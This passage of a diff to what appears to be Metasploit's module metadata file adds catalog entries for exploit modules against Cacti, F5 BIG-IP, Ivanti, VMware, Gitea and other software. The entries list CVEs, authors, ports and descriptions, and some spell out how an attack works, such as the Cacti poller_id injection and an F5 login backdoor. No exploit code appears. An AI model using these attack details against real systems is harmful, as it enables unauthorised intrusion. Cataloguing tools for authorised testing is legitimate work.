    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2022-11-01 14:22:49 +0000",
    "path": "/modules/auxiliary/scanner/snmp/snmp_enumusers.rb",
    "is_install_path": true,
    "ref_name": "scanner/snmp/snmp_enumusers",
@@ -51007,7 +51288,7 @@
    "author": [
      "RageLtMan <rageltman@sempervictus>"
    ],
-    "description": "This module provides a Rex based DNS service which can store static entries,\n        resolve names over pivots, and serve DNS requests across routed session comms.\n        DNS tunnels can operate across the the Rex switchboard, and DNS other modules\n        can use this as a template. Setting static records via hostfile allows for DNS\n        spoofing attacks without direct traffic manipulation at the handlers. handlers\n        for requests and responses provided here mimic the internal Rex functionality,\n        but utilize methods within this module's namespace to output content processed\n        in the Proc contexts via vprint_status.",
+    "description": "This module provides a Rex based DNS service which can store static entries,\n        resolve names over pivots, and serve DNS requests across routed session comms.\n        DNS tunnels can operate across the Rex switchboard, and DNS other modules\n        can use this as a template. Setting static records via hostfile allows for DNS\n        spoofing attacks without direct traffic manipulation at the handlers. handlers\n        for requests and responses provided here mimic the internal Rex functionality,\n        but utilize methods within this module's namespace to output content processed\n        in the Proc contexts via vprint_status.",
    "references": [

    ],
@@ -51021,7 +51302,7 @@
      "dns"
    ],
    "targets": null,
-    "mod_time": "2022-03-09 13:31:46 +0000",
+    "mod_time": "2022-12-04 17:41:24 +0000",
    "path": "/modules/auxiliary/server/dns/native_server.rb",
    "is_install_path": true,
    "ref_name": "server/dns/native_server",
@@ -58929,6 +59210,72 @@
    "session_types": false,
    "needs_cleanup": true
  },
+  "exploit_linux/http/cacti_unauthenticated_cmd_injection": {
+    "name": "Cacti 1.2.22 unauthenticated command injection",
+    "fullname": "exploit/linux/http/cacti_unauthenticated_cmd_injection",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2022-12-05",
+    "type": "exploit",
+    "author": [
+      "Stefan Schiller",
+      "Steven Seeley",
+      "Owen Gong",
+      "Erik Wynter"
+    ],
+    "description": "This module exploits an unauthenticated command injection\n          vulnerability in Cacti through 1.2.22 (CVE-2022-46169) in\n          order to achieve unauthenticated remote code execution as the\n          www-data user.\n\n          The module first attempts to obtain the Cacti version to see\n          if the target is affected. If LOCAL_DATA_ID and/or HOST_ID\n          are not set, the module will try to bruteforce the missing\n          value(s). If a valid combination is found, the module will\n          use these to attempt exploitation. If LOCAL_DATA_ID and/or\n          HOST_ID are both set, the module will immediately attempt\n          exploitation.\n\n          During exploitation, the module sends a GET request to\n          /remote_agent.php with the action parameter set to polldata\n          and the X-Forwarded-For header set to the provided value for\n          X_FORWARDED_FOR_IP (by default 127.0.0.1). In addition, the\n          poller_id parameter is set to the payload and the host_id\n          and local_data_id parameters are set to the bruteforced or\n          provided values. If X_FORWARDED_FOR_IP is set to an address\n          that is resolvable to a hostname in the poller table, and the\n          local_data_id and host_id values are vulnerable, the payload\n          set for poller_id will be executed by the target.\n\n          This module has been successfully tested against Cacti\n          version 1.2.22 running on Ubuntu 21.10 (vulhub docker image)",
+    "references": [
+      "CVE-2022-46169",
+      "URL-https://github.com/Cacti/cacti/security/advisories/GHSA-6p93-p743-35gf",
+      "URL-https://github.com/vulhub/vulhub/tree/master/cacti/CVE-2022-46169",
+      "URL-https://www.sonarsource.com/blog/cacti-unauthenticated-remote-code-execution"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd, x86, x64",
+    "rport": 8080,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic (Unix In-Memory)",
+      "Automatic (Linux Dropper)"
+    ],
+    "mod_time": "2023-01-23 11:53:19 +0000",
+    "path": "/modules/exploits/linux/http/cacti_unauthenticated_cmd_injection.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/cacti_unauthenticated_cmd_injection",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/http/cayin_cms_ntp": {
    "name": "Cayin CMS NTP Server RCE",
    "fullname": "exploit/linux/http/cayin_cms_ntp",
@@ -61839,6 +62186,125 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800": {
+    "name": "F5 BIG-IP iControl Authenticated RCE via RPM Creator",
+    "fullname": "exploit/linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2022-11-16",
+    "type": "exploit",
+    "author": [
+      "Ron Bowes"
+    ],
+    "description": "This module exploits a newline injection into an RPM .rpmspec file\n          that permits authenticated users to remotely execute commands.\n\n          Successful exploitation results in remote code execution\n          as the root user.",
+    "references": [
+      "CVE-2022-41800",
+      "URL-https://www.rapid7.com/blog/post/2022/11/16/cve-2022-41622-and-cve-2022-41800-fixed-f5-big-ip-and-icontrol-rest-vulnerabilities-and-exposures/",
+      "URL-https://support.f5.com/csp/article/K97843387",
+      "URL-https://support.f5.com/csp/article/K13325942"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Default"
+    ],
+    "mod_time": "2022-11-23 10:42:07 +0000",
+    "path": "/modules/exploits/linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800",
+    "check": false,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": true
+  },
+  "exploit_linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622": {
+    "name": "F5 BIG-IP iControl CSRF File Write SOAP API",
+    "fullname": "exploit/linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2022-11-16",
+    "type": "exploit",
+    "author": [
+      "Ron Bowes"
+    ],
+    "description": "This module exploits a cross-site request forgery (CSRF) vulnerability\n          in F5 Big-IP's iControl interface to write an arbitrary file to the\n          filesystem.\n\n          While any file can be written to any location as root, the\n          exploitability is limited by SELinux; the vast majority of writable\n          locations are unavailable. By default, we write to a script that\n          executes at reboot, which means the payload will execute the next time\n          the server boots.\n\n          An alternate target - Login - will add a backdoor that executes next\n          time a user logs in interactively. This overwrites a file,\n          but we restore it when we get a session\n\n          Note that because this is a CSRF vulnerability, it starts a web\n          server, but an authenticated administrator must visit the site, which\n          redirects them to the target.",
+    "references": [
+      "CVE-2022-41622",
+      "URL-https://github.com/rbowes-r7/refreshing-soap-exploit",
+      "URL-https://www.rapid7.com/blog/post/2022/11/16/cve-2022-41622-and-cve-2022-41800-fixed-f5-big-ip-and-icontrol-rest-vulnerabilities-and-exposures/",
+      "URL-https://support.f5.com/csp/article/K97843387",
+      "URL-https://support.f5.com/csp/article/K94221585",
+      "URL-https://support.f5.com/csp/article/K05403841"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd",
+    "rport": 443,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Restart",
+      "Login",
+      "Custom"
+    ],
+    "mod_time": "2022-11-18 16:18:25 +0000",
+    "path": "/modules/exploits/linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": true
+  },
  "exploit_linux/http/flir_ax8_unauth_rce_cve_2022_37061": {
    "name": "FLIR AX8 unauthenticated RCE",
    "fullname": "exploit/linux/http/flir_ax8_unauth_rce_cve_2022_37061",
@@ -62776,7 +63242,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2021-08-27 17:15:33 +0000",
+    "mod_time": "2022-12-04 17:41:24 +0000",
    "path": "/modules/exploits/linux/http/gravcms_exec.rb",
    "is_install_path": true,
    "ref_name": "linux/http/gravcms_exec",
@@ -63494,6 +63960,72 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_linux/http/ivanti_csa_unauth_rce_cve_2021_44529": {
+    "name": "Ivanti Cloud Services Appliance (CSA) Command Injection",
+    "fullname": "exploit/linux/http/ivanti_csa_unauth_rce_cve_2021_44529",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2021-12-02",
+    "type": "exploit",
+    "author": [
+      "Jakub Kramarz",
+      "h00die-gr3y <h00die.gr3y@gmail.com>"
+    ],
+    "description": "This module exploits a command injection vulnerability in the Ivanti Cloud Services Appliance (CSA)\n          for Ivanti Endpoint Manager. A cookie based code injection vulnerability in the\n          Cloud Services Appliance before `4.6.0-512` allows an unauthenticated user to\n          execute arbitrary code with limited permissions. Successful exploitation results\n          in command execution as the `nobody` user.",
+    "references": [
+      "CVE-2021-44529",
+      "URL-https://forums.ivanti.com/s/article/SA-2021-12-02",
+      "URL-https://attackerkb.com/topics/XTKrwlZd7p/cve-2021-44529",
+      "EDB-50833",
+      "PACKETSTORM-166383"
+    ],
+    "platform": "Linux,PHP,Unix",
+    "arch": "cmd, x64, php",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix Command",
+      "PHP Command",
+      "Linux Dropper"
+    ],
+    "mod_time": "2023-01-09 17:04:25 +0000",
+    "path": "/modules/exploits/linux/http/ivanti_csa_unauth_rce_cve_2021_44529.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/ivanti_csa_unauth_rce_cve_2021_44529",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/http/jenkins_cli_deserialization": {
    "name": "Jenkins CLI Deserialization",
    "fullname": "exploit/linux/http/jenkins_cli_deserialization",
@@ -63930,6 +64462,72 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_linux/http/linear_emerge_unauth_rce_cve_2019_7256": {
+    "name": "Linear eMerge E3-Series Access Controller Command Injection",
+    "fullname": "exploit/linux/http/linear_emerge_unauth_rce_cve_2019_7256",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2019-10-29",
+    "type": "exploit",
+    "author": [
+      "Gjoko Krstic <gjoko@applied-risk.com>",
+      "h00die-gr3y <h00die.gr3y@gmail.com>"
+    ],
+    "description": "This module exploits a command injection vulnerability in the Linear eMerge\n          E3-Series Access Controller. The Linear eMerge E3 versions `1.00-06` and below are vulnerable\n          to unauthenticated command injection in card_scan_decoder.php via the  `No` and `door` HTTP GET parameter.\n          Successful exploitation results in command execution as the `root` user.",
+    "references": [
+      "CVE-2019-7256",
+      "URL-https://applied-risk.com/resources/ar-2019-005",
+      "URL-https://na.niceforyou.com/",
+      "URL-https://attackerkb.com/topics/8WUJkci8N4/cve-2019-7256",
+      "EDB-47649",
+      "PACKETSTORM-155256"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd, armle",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix Command",
+      "Linux Dropper"
+    ],
+    "mod_time": "2023-01-04 16:56:16 +0000",
+    "path": "/modules/exploits/linux/http/linear_emerge_unauth_rce_cve_2019_7256.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/linear_emerge_unauth_rce_cve_2019_7256",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/http/linksys_apply_cgi": {
    "name": "Linksys WRT54 Access Point apply.cgi Buffer Overflow",
    "fullname": "exploit/linux/http/linksys_apply_cgi",
@@ -66286,6 +66884,68 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_linux/http/opentsdb_yrange_cmd_injection": {
+    "name": "OpenTSDB 2.4.0 unauthenticated command injection",
+    "fullname": "exploit/linux/http/opentsdb_yrange_cmd_injection",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2020-11-18",
+    "type": "exploit",
+    "author": [
+      "Shai rod",
+      "Erik Wynter"
+    ],
+    "description": "This module exploits an unauthenticated command injection\n          vulnerability in the yrange parameter in OpenTSDB through\n          2.4.0 (CVE-2020-35476) in order to achieve unauthenticated\n          remote code execution as the root user.\n\n          The module first attempts to obtain the OpenTSDB version via\n          the api. If the version is 2.4.0 or lower, the module\n          performs additional checks to obtain the configured metrics\n          and aggregators. It then randomly selects one metric and one\n          aggregator and uses those to instruct the target server to\n          plot a graph. As part of this request, the yrange parameter is\n          set to the payload, which will then be executed by the target\n          if the latter is vulnerable.\n\n          This module has been successfully tested against OpenTSDB\n          version 2.3.0.",
+    "references": [
+      "CVE-2020-35476",
+      "URL-https://github.com/OpenTSDB/opentsdb/issues/2051"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd, x86, x64",
+    "rport": 4242,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic (Unix In-Memory)",
+      "Automatic (Linux Dropper)"
+    ],
+    "mod_time": "2022-12-23 13:38:16 +0000",
+    "path": "/modules/exploits/linux/http/opentsdb_yrange_cmd_injection.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/opentsdb_yrange_cmd_injection",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/http/pandora_fms_events_exec": {
    "name": "Pandora FMS Events Remote Command Execution",
    "fullname": "exploit/linux/http/pandora_fms_events_exec",
@@ -69822,6 +70482,72 @@
    "session_types": false,
    "needs_cleanup": true
  },
+  "exploit_linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144": {
+    "name": "VMware NSX Manager XStream unauthenticated RCE",
+    "fullname": "exploit/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2022-10-25",
+    "type": "exploit",
+    "author": [
+      "h00die-gr3y",
+      "Sina Kheirkhah",
+      "Steven Seeley"
+    ],
+    "description": "VMware Cloud Foundation (NSX-V) contains a remote code execution vulnerability via XStream open source library.\n          VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8.\n          Due to an unauthenticated endpoint that leverages XStream for input serialization in VMware Cloud Foundation (NSX-V),\n          a malicious actor can get remote code execution in the context of 'root' on the appliance.\n          VMware Cloud Foundation 3.x and more specific NSX Manager Data Center for vSphere up to and including version 6.4.13\n          are vulnerable to Remote Command Injection.\n\n          This module exploits the vulnerability to upload and execute payloads gaining root privileges.",
+    "references": [
+      "CVE-2021-39144",
+      "URL-https://www.vmware.com/security/advisories/VMSA-2022-0027.html",
+      "URL-https://kb.vmware.com/s/article/89809",
+      "URL-https://srcincite.io/blog/2022/10/25/eat-what-you-kill-pre-authenticated-rce-in-vmware-nsx-manager.html",
+      "URL-https://attackerkb.com/topics/ngprN6bu76/cve-2021-39144"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd, x86, x64",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix (In-Memory)",
+      "Linux Dropper"
+    ],
+    "mod_time": "2022-11-12 10:21:43 +0000",
+    "path": "/modules/exploits/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/http/vmware_vcenter_analytics_file_upload": {
    "name": "VMware vCenter Server Analytics (CEIP) Service File Upload",
    "fullname": "exploit/linux/http/vmware_vcenter_analytics_file_upload",
@@ -70947,7 +71673,7 @@
    "targets": [
      "Zimbra Collaboration Suite"
    ],
-    "mod_time": "2022-10-19 10:02:29 +0000",
+    "mod_time": "2022-11-23 13:09:47 +0000",
    "path": "/modules/exploits/linux/http/zimbra_cpio_cve_2022_41352.rb",
    "is_install_path": true,
    "ref_name": "linux/http/zimbra_cpio_cve_2022_41352",
@@ -71077,7 +71803,7 @@
    "targets": [
      "Zimbra Collaboration Suite"
    ],
-    "mod_time": "2022-08-17 10:19:36 +0000",
+    "mod_time": "2022-12-06 15:07:28 +0000",
    "path": "/modules/exploits/linux/http/zimbra_unrar_cve_2022_30333.rb",
    "is_install_path": true,
    "ref_name": "linux/http/zimbra_unrar_cve_2022_30333",
@@ -73866,7 +74592,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2022-10-08 09:50:25 +0000",
+    "mod_time": "2022-11-25 15:13:57 +0000",
    "path": "/modules/exploits/linux/local/polkit_dbus_auth_bypass.rb",
    "is_install_path": true,
    "ref_name": "linux/local/polkit_dbus_auth_bypass",
@@ -73978,7 +74704,7 @@
    "targets": [
      "Auto"
    ],
-    "mod_time": "2021-02-17 12:33:59 +0000",
+    "mod_time": "2022-11-12 16:19:50 +0000",
    "path": "/modules/exploits/linux/local/ptrace_traceme_pkexec_helper.rb",
    "is_install_path": true,
    "ref_name": "linux/local/ptrace_traceme_pkexec_helper",
@@ -74695,7 +75421,7 @@
    "targets": [
      "Auto"
    ],
-    "mod_time": "2022-10-03 16:53:14 +0000",
+    "mod_time": "2022-12-01 14:34:09 +0000",
    "path": "/modules/exploits/linux/local/ubuntu_enlightenment_mount_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "linux/local/ubuntu_enlightenment_mount_priv_esc",
@@ -74876,6 +75602,66 @@
    ],
    "needs_cleanup": true
  },
+  "exploit_linux/local/vcenter_java_wrapper_vmon_priv_esc": {
+    "name": "VMware vCenter vScalation Priv Esc",
+    "fullname": "exploit/linux/local/vcenter_java_wrapper_vmon_priv_esc",
+    "aliases": [
+
+    ],
+    "rank": 0,
+    "disclosure_date": "2021-09-21",
+    "type": "exploit",
+    "author": [
+      "h00die",
+      "Yuval Lazar"
+    ],
+    "description": "This module exploits a privilege escalation in vSphere/vCenter due to improper permissions on the\n          /usr/lib/vmware-vmon/java-wrapper-vmon file. It is possible for anyone in the\n          cis group to write to the file, which will execute as root on vmware-vmon service\n          restart or host reboot.\n\n          This module was successfully tested against VMware VirtualCenter 6.5.0 build-7070488.\n          The following versions should be vulnerable:\n          vCenter 7.0 before U2c\n          vCenter 6.7 before U3o\n          vCenter 6.5 before U3q",
+    "references": [
+      "URL-https://pentera.io/blog/vscalation-cve-2021-22015-local-privilege-escalation-in-vmware-vcenter-pentera-labs/",
+      "CVE-2021-22015",
+      "URL-https://www.vmware.com/security/advisories/VMSA-2021-0020.html"
+    ],
+    "platform": "Linux",
+    "arch": "x86, x64",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Auto"
+    ],
+    "mod_time": "2022-12-01 14:55:43 +0000",
+    "path": "/modules/exploits/linux/local/vcenter_java_wrapper_vmon_priv_esc.rb",
+    "is_install_path": true,
+    "ref_name": "linux/local/vcenter_java_wrapper_vmon_priv_esc",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-service-down"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "config-changes",
+        "ioc-in-logs"
+      ],
+      "AKA": [
+        "vScalation"
+      ]
+    },
+    "session_types": [
+      "shell",
+      "meterpreter"
+    ],
+    "needs_cleanup": true
+  },
  "exploit_linux/local/vmware_alsa_config": {
    "name": "VMware Workstation ALSA Config File Local Privilege Escalation",
    "fullname": "exploit/linux/local/vmware_alsa_config",
@@ -77735,7 +78521,7 @@
    "targets": [
      "Linux x86"
    ],
-    "mod_time": "2022-02-14 09:01:05 +0000",
+    "mod_time": "2023-01-04 14:45:58 +0000",
    "path": "/modules/exploits/linux/smtp/exim4_dovecot_exec.rb",
    "is_install_path": true,
    "ref_name": "linux/smtp/exim4_dovecot_exec",
@@ -83742,6 +84528,67 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_multi/http/churchinfo_upload_exec": {
+    "name": "ChurchInfo 1.2.13-1.3.0 Authenticated RCE",
+    "fullname": "exploit/multi/http/churchinfo_upload_exec",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2021-10-30",
+    "type": "exploit",
+    "author": [
+      "m4lwhere <m4lwhere@protonmail.com>"
+    ],
+    "description": "This module exploits the logic in the CartView.php page when crafting a draft email with an attachment.\n          By uploading an attachment for a draft email, the attachment will be placed in the /tmp_attach/ folder of the\n          ChurchInfo web server, which is accessible over the web by any user. By uploading a PHP attachment and\n          then browsing to the location of the uploaded PHP file on the web server, arbitrary code\n          execution as the web daemon user (e.g. www-data) can be achieved.",
+    "references": [
+      "URL-http://www.churchdb.org/",
+      "URL-http://sourceforge.net/projects/churchinfo/",
+      "CVE-2021-43258"
+    ],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic Targeting"
+    ],
+    "mod_time": "2022-11-18 18:04:51 +0000",
+    "path": "/modules/exploits/multi/http/churchinfo_upload_exec.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/churchinfo_upload_exec",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "CRASH_SAFE"
+      ],
+      "Reliability": [
+        "REPEATABLE_SESSION"
+      ],
+      "SideEffects": [
+        "ARTIFACTS_ON_DISK",
+        "IOC_IN_LOGS"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": true
+  },
  "exploit_multi/http/cisco_dcnm_upload": {
    "name": "Cisco Prime Data Center Network Manager Arbitrary File Upload",
    "fullname": "exploit/multi/http/cisco_dcnm_upload",
@@ -85223,6 +86070,70 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_multi/http/gitea_git_fetch_rce": {
+    "name": "Gitea Git Fetch Remote Code Execution",
+    "fullname": "exploit/multi/http/gitea_git_fetch_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2022-05-16",
+    "type": "exploit",
+    "author": [
+      "wuhan005",
+      "li4n0",
+      "krastanoel"
+    ],
+    "description": "This module exploits Git fetch command in Gitea repository migration\n          process that leads to a remote command execution on the system.\n          This vulnerability affect Gitea before 1.16.7 version.",
+    "references": [
+      "CVE-2022-30781",
+      "URL-https://tttang.com/archive/1607/"
+    ],
+    "platform": "Linux,Unix,Windows",
+    "arch": "cmd",
+    "rport": 3000,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix Command",
+      "Linux Dropper",
+      "Windows Command",
+      "Windows Dropper"
+    ],
+    "mod_time": "2022-11-17 12:25:52 +0000",
+    "path": "/modules/exploits/multi/http/gitea_git_fetch_rce.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/gitea_git_fetch_rce",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_multi/http/gitea_git_hooks_rce": {
    "name": "Gitea Git Hooks Remote Code Execution",
    "fullname": "exploit/multi/http/gitea_git_hooks_rce",
@@ -87287,7 +88198,7 @@
      "Windows",
      "Linux"
    ],
-    "mod_time": "2022-03-22 08:55:59 +0000",
+    "mod_time": "2022-12-15 12:51:30 +0000",
    "path": "/modules/exploits/multi/http/log4shell_header_injection.rb",
    "is_install_path": true,
    "ref_name": "multi/http/log4shell_header_injection",
@@ -98240,7 +99151,7 @@
      "Apache OpenOffice on Windows (PSH)",
      "Apache OpenOffice on Linux/OSX (Python)"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2022-11-30 22:10:18 +0000",
    "path": "/modules/exploits/multi/misc/openoffice_document_macro.rb",
    "is_install_path": true,
    "ref_name": "multi/misc/openoffice_document_macro",
@@ -101198,6 +102109,62 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_osx/local/acronis_trueimage_xpc_privesc": {
+    "name": "Acronis TrueImage XPC Privilege Escalation",
+    "fullname": "exploit/osx/local/acronis_trueimage_xpc_privesc",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2020-11-11",
+    "type": "exploit",
+    "author": [
+      "Csaba Fitzl",
+      "Shelby Pace"
+    ],
+    "description": "Acronis TrueImage versions 2019 update 1 through 2021 update 1\n          are vulnerable to privilege escalation. The `com.acronis.trueimagehelper`\n          helper tool does not perform any validation on connecting clients,\n          which gives arbitrary clients the ability to execute functions provided\n          by the helper tool with `root` privileges.",
+    "references": [
+      "CVE-2020-25736",
+      "URL-https://kb.acronis.com/content/68061",
+      "URL-https://attackerkb.com/topics/a1Yrvagxt5/cve-2020-25736"
+    ],
+    "platform": "OSX",
+    "arch": "x64",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Auto"
+    ],
+    "mod_time": "2022-12-13 09:49:59 +0000",
+    "path": "/modules/exploits/osx/local/acronis_trueimage_xpc_privesc.rb",
+    "is_install_path": true,
+    "ref_name": "osx/local/acronis_trueimage_xpc_privesc",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": [
+      "shell",
+      "meterpreter"
+    ],
+    "needs_cleanup": true
+  },
  "exploit_osx/local/cfprefsd_race_condition": {
    "name": "macOS cfprefsd Arbitrary File Write Local Privilege Escalation",
    "fullname": "exploit/osx/local/cfprefsd_race_condition",
@@ -104248,7 +105215,7 @@
      "Unix Command",
      "BSD Dropper"
    ],
-    "mod_time": "2022-10-12 19:23:59 +0000",
+    "mod_time": "2022-10-24 14:17:21 +0000",
    "path": "/modules/exploits/unix/http/pfsense_pfblockerng_webshell.rb",
    "is_install_path": true,
    "ref_name": "unix/http/pfsense_pfblockerng_webshell",
@@ -104560,6 +105527,65 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_unix/http/syncovery_linux_rce_2022_36534": {
+    "name": "Syncovery For Linux Web-GUI Authenticated Remote Command Execution",
+    "fullname": "exploit/unix/http/syncovery_linux_rce_2022_36534",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2022-09-06",
+    "type": "exploit",
+    "author": [
+      "Jan Rude"
+    ],
